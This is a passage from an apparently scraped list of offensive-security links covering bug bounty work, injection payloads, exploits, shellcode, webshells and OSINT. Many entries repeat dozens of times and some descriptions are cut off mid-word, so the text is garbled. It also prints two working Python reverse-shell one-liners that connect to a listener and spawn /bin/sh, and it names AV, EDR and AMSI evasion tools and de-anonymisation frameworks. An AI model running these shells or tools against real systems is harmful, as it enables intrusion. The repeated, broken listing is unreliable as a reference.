• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• RPC Bug Hunting Case Studies – Part 1
• Dangerous Injections
• HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How.
• Enjoying my first blind xxe experience
• GraphQL - voyager/) [graphql](https://github.com/APIs-guru/graphql-voyager):  Represent any GraphQL API as an interactive graph.
• Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• XS-Leaks - site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.
• Handling Short Expiration Time of Authorization Tokens
• Planilhas Baby
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• An investigation into SQL Injection tools — The pattern of each attack tool Part II
• Advanced SQL Injection
• Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Dumping a complete database using SQL injection
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• kadimus
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• DNS Hijacking Attacks on Home Routers in Brazil
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Handling Short Expiration Time of Authorization Tokens
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Handling Short Expiration Time of Authorization Tokens
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Awesome one-liner bug bounty
• Dangerous Injections
• Dangerous Injections
• Command Injection Payload List
• XML External Entity (XXE) Injection Payload List
• RFI/LFI Payload List
• Shikata Ga Nai Encoder Still Going Strong
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Phantom-Evasion
• Steganography
• PyFuscation
• System Calls
• bbrecon
• axiom
• KindleDrip
• BugBountyScanner
• Bug Bounty Reconnaissance Framework
• KeyHacks
• NotKeyHacks - F and save a lot of time.
• KingOfBugBounty Project - known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters..
• awesome-web-hacking
• gau
• bugbounty-cheatsheet
• Awesome Bug Bounty - ups.
• ParamSpider
• crlf-injector
• CRLF Bruter
• Web Security CheatSheet
• Zeus-Scanner - in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
• Dangerous Injections
• Dumping a complete database using SQL injection
• The Powerful HTTP Request Smuggling
• Smuggler
• HTTP.Request.Smuggling.Desync.Attack
• HTTP Request Smuggler
• How to solve a challenge from Intigriti in under 60 minutes
• DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
• Gf-Patterns
• lorsrf
• XMLDecoder payload generator
• dtd-finder
• Advanced XXE Exploitation
• ysoserial - of-concept tool for generating payloads that exploit unsafe Java object deserialization.
• Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484) - tomcat/java/org/apache/naming/factory/BeanFactory.java): java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
• CVE-2020-9484-Mass-Scan
• marshalsec
• SerializationDumper
• owaspsd-deserialize-my-shorts
• Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
• GraphQL security 101
• Debugging your GraphQL server was never this easy!
• GraphQL Voyager
• GraphQLmap
• ProtoFuzz
• pbtk - Reverse engineering Protobuf apps - based apps.
• DSSS
• Garud - domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.
• httpx - purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
• waybackurls
• Awesome Electron.js hacking & pentesting resources
• Turbo Search
• posta - document Messaging security research tool. [Cross document messaging is a very common communication method.](https://twitter.com/naglinagli/status/1366416250373562371)
• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation
• Chrome extension to detect possible xsleaks
• Web Finder
• Flask Unsign - force and craft session cookies of a Flask application by guessing secret keys.
• jwt-pwn
• Awesome Burp Extensions
• BurpSuiteHTTPSmuggler
• AutoRepeater
• privatecollaborator - certificate
• Burp Collaborator Server docker container with LetsEncrypt certificate
• Femida-xss - xss search for Burp Suite
• dotNetBeautifier
• Java-Deserialization-Scanner - in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
• JavaSerialKiller
• BurpBounty
• BurpExtension-WhatsApp-Decryption-CheckPoint
• InQL - scanner-v3.html): A Burp Extension for GraphQL Security Testing.
• param-miner
• PII-Identifier
• 403Bypasser
• Handling Short Expiration Time of Authorization Tokens
• BurpSuite-Team-Extension - versa!
• ActiveScan++
• Dangerous Injections
• Payloads Collection
• SQL Injection Payload List
• MSFVenom - CheatSheet
• Shikata Ga Nai Encoder Still Going Strong
• MSFVenom Cheatsheet
• Payload Delivery for DevOps - Platform Dropper Using the Genesis Framework, Metasploit and Docker. [code](https://github.com/gen0cide/gscript)
• Hiding malicious code with “Module Stomping”: Part 1
• Our top tips for better bug bounty reports, plus a hacker contest!
• Two Rights Might Make A Wrong
• You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
• Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
• SQL Injection
• Dangerous Injections
• Postgres SQL Injection Cheat Sheet
• From SQL Injection to Shell: PostgreSQL edition
• SQL injection
• HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How.
• an XSS payload, Cuneiform-alphabet based
• Find reflected parameters with Burp_Suite
• Enjoying my first blind xxe experience
• New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
• SerialVersionUID in Java
• Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
• Deserialization
• LazySSTICheck
• Easily Identify Malicious Servers on the Internet with JARM
• JWT Vulnerabilities (Json Web Tokens)
• Hacking Starbucks and Accessing Nearly 100 Million Customer Records
• Burp Suite Cheat Sheet
• Deploying a private Burp Collaborator server
• AES-Killer v3.0
• create a Passive Profile for a param value, like *testsqli* and then create a Rule with this Profile to trigger SQLi active profile.

Exploits

• How I Found My First Ever ZeroDay (In RDP)
• Security Focus
• Exploits, Vulnerabilities and Payloads: Practical Introduction
• Beginners Guide to 0day/CVE AppSec Research
• Traditional Buffer Overflow Windows cheatsheet
• Exploit writing tutorial part 3 : SEH Based Exploits
• Script to decode .vbe files
• Exploit Files
• Graphology of an Exploit
• Vulnerability Lab
• 0day.Today - The Underground, is one of the world's most popular and comprehensive computer security web sites.
• cxsecurity
• Attacking a co-hosted VM: A hacker, a hammer and two memory modules
• How To Create a Metasploit Module
• Installing Metasploit Pro, Ultimate, Express, and Community
• A First Introduction to System Exploitation
• WebKit exploit
• Python 2 vs 3 for Binary Exploitation Scripts
• DriveCrypt
• NAVEX
• Three New DDE Obfuscation Methods
• Attacking Google Authenticator
• Introduction to ptmalloc2 internals (Part 1)
• ptmalloc2 internals (Part 2) - Fast Bins and First Fit Redirection
• MikroTik Firewall & NAT Bypass
• Lets Create An EDR… And Bypass It! Part 1
• The Art of WebKit Exploitation
• Modern Binary Exploitation - Spring 2015
• Faxploit
• Jailbreaks Demystified
• UEFI vulnerabilities classification focused on BIOS implant delivery - update-tools-c246f7299459)
• GhostDelivery
• Beat the hole in the ATM
• Z-Shave. Exploiting Z-Wave downgrade attacks
• Totally Pwning the Tapplock Smart Lock - Andrew Tierney 13 Jun 2018
• Patchless AMSI bypass using SharpBlock
• Bypassing Antivirus with Golang – Gopher it!
• The Invoke-CradleCrafter Overview
• Sticky notes for pentesting. - notes)
• Exploit Files
• I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 - c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
• Lets Create An EDR… And Bypass It! Part 2
• A collection of vulnerable ARM binaries for practicing exploit development
• 3D Accelerated Exploitation - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
• Exploit Files
• Exploit Files
• IOSurface exploit
• Installing Metasploit Pro, Ultimate, Express, and Community
• unfurl - Based Link Vulnerability Analysis Tool](https://jlospinoso.github.io/python/unfurl/abrade/hacking/2018/02/08/unfurl-url-analysis.html)
• A collection of PHP exploit scripts
• Sage ACF Blocks
• beebug
• Three New DDE Obfuscation Methods
• SILENTTRINITY - exploitation agent powered by Python, IronPython, C#/.NET
• fuxploider
• Pacu - aws-exploitation-framework.html)
• movfuscator
• UEFI vulnerabilities classification focused on BIOS implant delivery - update-tools-c246f7299459)
• 3D Accelerated Exploitation - 3D Accelerated Exploitation. The talk dealt with research into the VirtualBox 3D Acceleration feature, which is backed by a software component called Chromium.
• RedGhost
• PowerSploit
• PEASS
• SharpBlock
• DVS - Lateral movement using DCOM Objects.
• The Exploit Database Git Repository
• Exploit Files
• Vulnerability DB
• mssqlproxy
• AllPocsFromHackerOne
• SharpSelfDelete
• preeny
• 0days In-The-Wild - Hello! This site aims to be a central repository for information about 0-days exploited in-the-wild! It's maintained by Google Project Zero.
• Exploit Files
• Faxploit
• Three New DDE Obfuscation Methods
• I found myself in need of a much shorter python reverse oneliner than shellpop provides by default. Here's what I landed on. 🙃 - c "import pty,socket;h,p='192.168.200.1',12345;socket.create_connection((h,p));pty.spawn('/bin/sh');"
• The Art of WebKit Exploitation
• Bypassing Antivirus with Golang – Gopher it!
• Exploit Files
• Traditional Buffer Overflow Windows cheatsheet

Reconnaissance

• PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
• Automated Reconnaissance Pipeline
• PERFORMING DOMAIN RECONNAISSANCE USING POWERSHELL
• subfinder
• urlhunter
• URLBrute
• degoogle - through links and other sketchiness.
• Investigator - recon tool.

Enumeration

• Ethical Hacking Course: Enumeration Theory
• Social Mapper - A Social Media Enumeration & Correlation Tool. [github repo](https://github.com/SpiderLabs/social_mapper)
• subdomains wordlists
• parameters wordlists
• Domain Dossier
• paths wordlists
• How to Roll a Strong Password with 20-Sided Dice and Fandom-Inspired Wordlists
• Assetnote Wordlists
• Default IoT Username/password
• X41 BeanStack
• OS Fingerprinting using NTP
• Admin-Scanner
• Weakpass - based online generator to create a wordlist based on a set of words entered by the user. [Kraker](https://github.com/zzzteph/kraker) is a distributed password brute-force system that focused on easy use.
• social_mapper
• linux-smart-enumeration
• Sublist3r
• subscraper
• massh-enum
• LinEnum
• linpostexp
• The art of subdomain enumeration - domain enumeration".
• LEGION - Automatic Enumeration Tool
• discover - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
• Z/OS System Enumeration Scripts
• WPExploitation
• CTFR - force, it just abuses of Certificate Transparency logs.
• feroxbuster
• grinder - end systems (Shodan, Censys)
• Admin-Scanner
• Virtual host scanner
• vhost-brute
• grab_beacon_config
• assetfinder
• hackerone_wordlist
• Duplicut - based password cracking)
• Collection of some common wordlists such as RDP password, user name list, ssh password wordlist for brute force. IP Cameras Default Passwords.
• Elpscrk
• Ghost Eye
• SuperEnum
• Skanuvaty
• TireFire - ish platform. Great for OSCP/HTB type Machines as well as penetration testing.
• Ethical Hacking Course: Enumeration Theory
• Social Mapper - A Social Media Enumeration & Correlation Tool. [github repo](https://github.com/SpiderLabs/social_mapper)

WebShells

• Did you know that Python's simple web server can run CGI scripts
• novahot
• Weevely
• Web-Shells
• Did you know that Python's simple web server can run CGI scripts

ShellCodes

• Why is My Perfectly Good Shellcode Not Working?
• C-S1lentProcess1njector
• Shellab
• I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) - lnvp 1234 / python3 -c "# 107, single statement, non-blocking __import__("subprocess").Popen("sh",0,None,*[ __import__("socket").create_connection(("127.0.0.1",1234))]*3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,*[ socket.create_connection(("127.0.0.1",1234))]*3)"
• Spawning reverse shells
• Reverse Shell Cheat Sheet
• Using tmux for automating interactive reverse shells
• New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
• Linux x86 Reverse Shell Shellcode
• mem-loader.asm - memory using an anonymous file descriptor (inspired by [x-c3ll](https://x-c3ll.github.io/posts/fileless-memfd_create/)
• Fully (auto) interactive TTY shells
• powershell reverse shell one-liner
• How to Execute Shell Commands with Python
• Reverse Shell to fully interactive
• Single-Line Web Shell
• Simple-Backdoor-One-Liner.php
• reverse shell
• Spawning interactive reverse shells with TTY
• Using tmux for automating interactive reverse shells
• Usando a pwntools para Binary Exploitation
• shellcoding using env variables
• From a C project, through assembly, to shellcode
• Writing and Compiling Shellcode in C
• Using ICMP to deliver shellcode
• Buffer Overflow Windows - EGGHUNTER cheatsheet
• Some lessons learned along the way to Buffer Overflow
• Windows 10 Exploit Development Setup - Vulnserver Walkthrough Part 1
• Locating Kernel32 Base Address
• Finding Kernel32 Base and Function Addresses in Shellcode
• Basics of Windows shellcode writing
• Shellcodes database for study cases
• Using tmux for automating interactive reverse shells
• A fun trick for running shellcode directly from bash
• Simple Shellcode Tale! - Fault-ao-executar-o-shellcode-1341182f023846ec9ad4da5b1729f7aa)
• Linux x86 execve("/bin/sh") - 28 bytes
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• USING A C# SHELLCODE RUNNER AND CONFUSEREX TO BYPASS UAC WHILE EVADING AV
• metasploit, x86/alpha_mixed and Windows 7 are killing me
• Resolving API addresses in memory
• Polyglot Assembly
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• ThreadBoat
• python-pty-shells - full PTY or nothing!
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Ten process injection techniques: A technical survey of common and trending process injection techniques
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Return Oriented Programming (ROP) Attacks
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• SnapLoader
• Using tmux for automating interactive reverse shells
• Using tmux for automating interactive reverse shells
• Shellen
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• shellcode2asmjs - Spray payloads
• Unicorn
• pe_to_shellcode
• stager.dll - metasploit-shellcode-to-evade-windows-defender/)
• ThreadBoat
• Excel4-DCOM
• MaliciousMacroMSBuild
• SnapLoader
• ShellcodeWrapper
• python-pty-shells - full PTY or nothing!
• Powershell HTTP/S Reverse Shell
• HTTP/S Asynchronous Reverse Shell
• Reverse Shell Generator - shell-generator)
• shellver
• GTRS - Google Translator Reverse Shell
• Using tmux for automating interactive reverse shells
• CallObfuscator
• vba-obfuscator - PoC of malware code obfuscation in Word macros
• ProcessInjection
• Shellcodes database for study cases
• Return Oriented Programming (ROP) Attacks
• ROPgadget Tool
• ROP Gadget Prevalence and Survival under Compiler-based Binary Diversification Schemes
• one_gadget
• JOP ROCKET - oriented Programming Reversing Open Cyber Knowledge Expert Tool, or JOP ROCKET, is a tool designed to help facilitate JOP gadget discovery in an x86 Windows environment.
• Shellcode Injection Techniques
• Linux x86 execve("/bin/sh") - 28 bytes
• ShellCode Tester
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• Core
• Ninja UUID Shellcode Runner
• IPFuscator
• Shellcode Mutator - instruction sets (such as nops) to avoid signatures.
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode
• I saw a python reverse shell, thought it looked a little long (215 chars), so I came up with my own! (107/98 ch) - lnvp 1234 / python3 -c "# 107, single statement, non-blocking __import__("subprocess").Popen("sh",0,None,*[ __import__("socket").create_connection(("127.0.0.1",1234))]*3)" or "# 98, separators, blocking import subprocess as S,socket; S.run("sh",0,None,*[ socket.create_connection(("127.0.0.1",1234))]*3)"
• New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
• Usando a pwntools para Binary Exploitation
• Buffer Overflow Windows - EGGHUNTER cheatsheet
• RETURN ORIENTED PROGRAMMING (ROP)
• A fun trick for running shellcode directly from bash
• Windows/x86 Dynamic Bind Shell / Null-Free Shellcode

Reporting

• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• TryHackMe. Breaking Into the Kenobi Machine.
• This is how you can deliver true value through your pentest reports
• public-pentesting-reports
• report-ng - based reports with HP WebInspect / Burp Suite Pro input, own custom data and knowledge base.
• PandocPentestReport
• Technical Report template
• TryHackMe. Breaking Into the Kenobi Machine.
• PwnDoc
• This is how you can deliver true value through your pentest reports
• Offensive Security Exam Report Template in Markdown
• A List of Post-mortems!

OSINT - Open Source INTelligence

• OSINT tool for visualizing relationships between domains, IPs and email addresses.
• OSINT-y Goodness
• Identifying A Pro-Indonesian Propaganda Bot Network
• OSint Tools
• OSINT Resources for 2019
• Directory of Open Access Journals
• From email to phone number, a new OSINT approach
• sifter
• Image "Cloaking" for Personal Privacy - usenix20.pdf)
• IntelMQ - suite solution for IT security teams (CERTs & CSIRTs, SOCs abuse departments, etc.) for collecting and processing security feeds using a message queuing protocol. Its main goal is to give to incident responders an easy way to collect & process threat intelligence thus improving the incident handling processes of CERTs.
• 3WiFi
• Stealth plane in flight
• ExportData - Twitter data export tool. Allows downloading historical tweets since 2006, exporting followers & followings and collects historical trends in 467 locations.
• OSINT framework
• Instagram Scraper
• The closer a username/email address resembles other username/email addresses associated w/ a target, the easier it is to find (or guess &/or 'bruteforce') other usernames/email addresses associated w/ that target.
• WhatsMyName
• shadowbanned - eu/shadowban-eu-frontend)
• OSINT SAN Framework. - SAN Framework makes it possible to quickly find information and de-anonymize Internet users. The software is a framework that contains 30 functions for searching information or de-anonymizing users. With the help of my software, you can collect information about users on the Internet, anonymously and without special skills.
• How to bypass CloudFlare bot protection ?
• dorking
• Complete Google Dorks List in 2020 For Ethical Hacking and Penetration Testing
• DorkGenius
• MODIFYING TELEGRAM'S "PEOPLE NEARBY" FEATURE TO PINPOINT PEOPLE'S HOMES
• signald
• Breaking Mimblewimble’s Privacy Model
• OSINT – Passive Recon and Discovery of Assets
• OSINT – LinkedIn is Not Just for Jobs
• ꓘamerka GUI - ciech/Kamerka-GUI). ICS/IoT search: [ꓘamerka](https://woj-ciech.github.io/kamerka-demo/kamerka.html). [Kamerka OSINT tool shows your country's internet-connected critical infrastructure](https://www.zdnet.com/article/kamerka-osint-tool-shows-your-countrys-internet-connected-critical-infrastructure/)
• Slides from my ShellCon Talk, OSINT for Pen Tests, given 10/19.
• sn0int - automatic OSINT framework and package manager
• iKy
• Gitrob
• datasploit
• the-endorser
• OSINT-y Goodness
• Awesome OSINT
• Directory of Open Access Journals
